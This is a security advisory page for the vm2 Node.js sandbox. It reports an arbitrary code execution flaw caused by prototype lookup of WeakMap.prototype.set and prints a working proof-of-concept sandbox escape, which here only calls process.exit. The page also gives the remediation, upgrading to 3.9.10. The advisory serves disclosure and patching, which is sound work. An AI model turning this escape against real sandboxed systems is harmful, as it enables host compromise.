SNYK-JS-VM2-2990237
## Overview [vm2](https://github.com/patriksimek/vm2#readme) is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Affected versions of this package are vulnerable to Arbitrary Code Execution due to the usage of prototype lookup for the `WeakMap.prototype.set` method. Exploiting this vulnerability leads to access to a host object and a sandbox compromise. ## PoC ```js const { VM } = require('vm2'); new VM().run(` const { set } = WeakMap.prototype; WeakMap.prototype.set = function(v) { return set.call(this, v, v); }; Error.prepareStackTrace = Error.prepareStackTrace = (_, c) => c.map(c => c.getThis()).find(a => a); const { stack } = new Error(); Error.prepareStackTrace = undefined; stack.process.exit(1); `); // Never gets executed. console.log('Finished'); ``` ## Remediation Upgrade `vm2` to version 3.9.10 or higher. ## References - [GitHub Commit](https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69) - [GitHub Issue](https://github.com/patriksimek/vm2/issues/444) - [GitHub PR](https://github.com/patriksimek/vm2/pull/445)
Risk Scores
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| 0 |
Timeline
- Aug 24, 2022 CVE Updated
- Dec 20, 2022 CVE Published
References
- https://security.snyk.io/vuln/SNYK-JS-VM2-2990237 advisory
- https://learn.snyk.io/lesson/malicious-code-injection/ technical
- https://github.com/patriksimek/vm2#readme technical
- https://github.com/patriksimek/vm2/pull/445/commits/3a9876482be487b78a90ac459675da7f83f46d69 patch
- https://github.com/patriksimek/vm2/issues/444 issue
- https://github.com/patriksimek/vm2/pull/445 patch